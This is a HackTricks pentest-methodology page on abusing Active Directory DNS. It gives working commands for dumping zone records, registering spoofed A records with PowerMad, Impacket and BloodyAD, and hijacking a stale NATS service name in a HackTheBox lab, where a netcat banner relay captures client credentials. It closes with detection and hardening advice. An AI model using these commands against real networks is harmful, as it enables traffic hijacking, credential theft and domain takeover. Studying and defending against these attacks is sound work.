ad-dns-records.md (7578B)
1 --- 2 title: "AD DNS Records" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/ad-dns-records.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/ad-dns-records.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # AD DNS Records 14 15 By default **any user** in Active Directory can **enumerate all DNS records** in the Domain or Forest DNS zones, similar to a zone transfer (users can list the child objects of a DNS zone in an AD environment). 16 17 The tool [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) enables **enumeration** and **exporting** of **all DNS records** in the zone for recon purposes of internal networks.<sup>[[4]](#references)</sup> 18 19 ```bash 20 git clone https://github.com/dirkjanm/adidnsdump 21 cd adidnsdump 22 pip install . 23 24 # Enumerate the default zone and resolve the "hidden" records 25 adidnsdump -u domain_name\\username ldap://10.10.10.10 -r 26 27 # Quickly list every zone (DomainDnsZones, ForestDnsZones, legacy zones,…) 28 adidnsdump -u domain_name\\username ldap://10.10.10.10 --print-zones 29 30 # Dump a specific zone (e.g. ForestDnsZones) 31 adidnsdump -u domain_name\\username ldap://10.10.10.10 --zone _msdcs.domain.local -r 32 33 cat records.csv 34 ``` 35 36 > adidnsdump v1.4.0 (April 2025) adds JSON/Greppable (`--json`) output, multi-threaded DNS resolution and support for TLS 1.2/1.3 when binding to LDAPS 37 38 For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)<sup>[[4]](#references)</sup> 39 40 --- 41 42 ## Creating / Modifying records (ADIDNS spoofing) 43 44 Because the **Authenticated Users** group has **Create Child** on the zone DACL by default, any domain account (or computer account) can register additional records. This can be used for traffic hijacking, NTLM relay coercion or even full domain compromise. 45 46 ### PowerMad / Invoke-DNSUpdate (PowerShell) 47 48 ```powershell 49 Import-Module .\Powermad.ps1 50 51 # Add A record evil.domain.local → attacker IP 52 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Verbose 53 54 # Delete it when done 55 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Delete -Verbose 56 ``` 57 58 ### Impacket – dnsupdate.py (Python) 59 60 ```bash 61 # add/replace an A record via secure dynamic-update 62 python3 dnsupdate.py -u 'DOMAIN/user:Passw0rd!' -dc-ip 10.10.10.10 -action add -record evil.domain.local -type A -data 10.10.14.37 63 ``` 64 65 *(dnsupdate.py ships with Impacket ≥0.12.0)* 66 67 ### BloodyAD 68 69 ```bash 70 bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.14.37 71 ``` 72 73 --- 74 75 ## Common attack primitives 76 77 1. **Wildcard record** – `*.<zone>` turns the AD DNS server into an enterprise-wide responder similar to LLMNR/NBNS spoofing. It can be abused to capture NTLM hashes or to relay them to LDAP/SMB. (Requires WINS-lookup to be disabled.)<sup>[[1]](#references)</sup> 78 2. **WPAD hijack** – add `wpad` (or an **NS** record pointing to an attacker host to bypass the Global-Query-Block-List) and transparently proxy outbound HTTP requests to harvest credentials. Microsoft patched the wildcard/ DNAME bypasses (CVE-2018-8320) but **NS-records still work**.<sup>[[1]](#references)</sup> 79 3. **Stale entry takeover** – claim the IP address that previously belonged to a workstation and the associated DNS entry will still resolve, enabling resource-based constrained delegation or Shadow-Credentials attacks without touching DNS at all. 80 4. **DHCP → DNS spoofing** – on a default Windows DHCP+DNS deployment an unauthenticated attacker on the same subnet can overwrite any existing A record (including Domain Controllers) by sending forged DHCP requests that trigger dynamic DNS updates (Akamai “DDSpoof”, 2023). This gives machine-in-the-middle over Kerberos/LDAP and can lead to full domain takeover.<sup>[[2]](#references)</sup> 81 5. **Certifried (CVE-2022-26923)** – change the `dNSHostName` of a machine account you control, register a matching A record, then request a certificate for that name to impersonate the DC. Tools such as **Certipy** or **BloodyAD** fully automate the flow. 82 83 --- 84 85 ### Internal service hijacking via stale dynamic records (NATS case study) 86 87 When dynamic updates stay open to all authenticated users, **a de-registered service name can be re-claimed and pointed to attacker infrastructure**. The Mirage HTB DC exposed the hostname `nats-svc.mirage.htb` after DNS scavenging, so any low-privileged user could:<sup>[[3]](#references)</sup> 88 89 1. **Confirm the record is missing** and learn the SOA with `dig`: 90 91 ```bash 92 dig @dc01.mirage.htb nats-svc.mirage.htb 93 ``` 94 95 2. **Re-create the record** toward an external/VPN interface they control: 96 97 ```bash 98 nsupdate 99 > server 10.10.11.78 100 > update add nats-svc.mirage.htb 300 A 10.10.14.2 101 > send 102 ``` 103 104 3. **Impersonate the plaintext service**. NATS clients expect to see one `INFO { ... }` banner before they send credentials, so copying a legitimate banner from the real broker is enough to harvest secrets: 105 106 ```bash 107 # Capture a single INFO line from the real service and replay it to victims 108 nc 10.10.11.78 4222 | head -1 | nc -lnvp 4222 109 ``` 110 111 Any client that resolves the hijacked name will immediately leak its JSON `CONNECT` frame (including `"user"`/`"pass"`) to the listener. Running the official `nats-server -V` binary on the attacker host, disabling its log redaction, or just sniffing the session with Wireshark yields the same plaintext credentials because TLS was optional. 112 113 4. **Pivot with the captured creds** – in Mirage the stolen NATS account provided JetStream access, which exposed historic authentication events containing reusable AD usernames/passwords. 114 115 This pattern applies to every AD-integrated service that relies on unsecured TCP handshakes (HTTP APIs, RPC, MQTT, etc.): once the DNS record is hijacked, the attacker becomes the service. 116 117 --- 118 119 ## Detection & hardening 120 121 * Deny **Authenticated Users** the *Create all child objects* right on sensitive zones and delegate dynamic updates to a dedicated account used by DHCP. 122 * If dynamic updates are required, set the zone to **Secure-only** and enable **Name Protection** in DHCP so that only the owner computer object can overwrite its own record. 123 * Monitor DNS Server event IDs 257/252 (dynamic update), 770 (zone transfer) and LDAP writes to `CN=MicrosoftDNS,DC=DomainDnsZones`. 124 * Block dangerous names (`wpad`, `isatap`, `*`) with an intentionally-benign record or via the Global Query Block List. 125 * Keep DNS servers patched – e.g., RCE bugs CVE-2024-26224 and CVE-2024-26231 reached **CVSS 9.8** and are remotely exploitable against Domain Controllers. 126 127 ## References 128 129 - [1] [ADIDNS Revisited - WPAD, GQBL, and More](https://www.netspi.com/blog/technical-blog/network-pentesting/adidns-revisited/) (2018, still the de-facto reference for wildcard/WPAD attacks) 130 - [2] [Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates](https://www.akamai.com/blog/security-research/spoofing-dns-by-abusing-dhcp) (Dec 2023) 131 - [3] [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html) 132 - [4] [Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)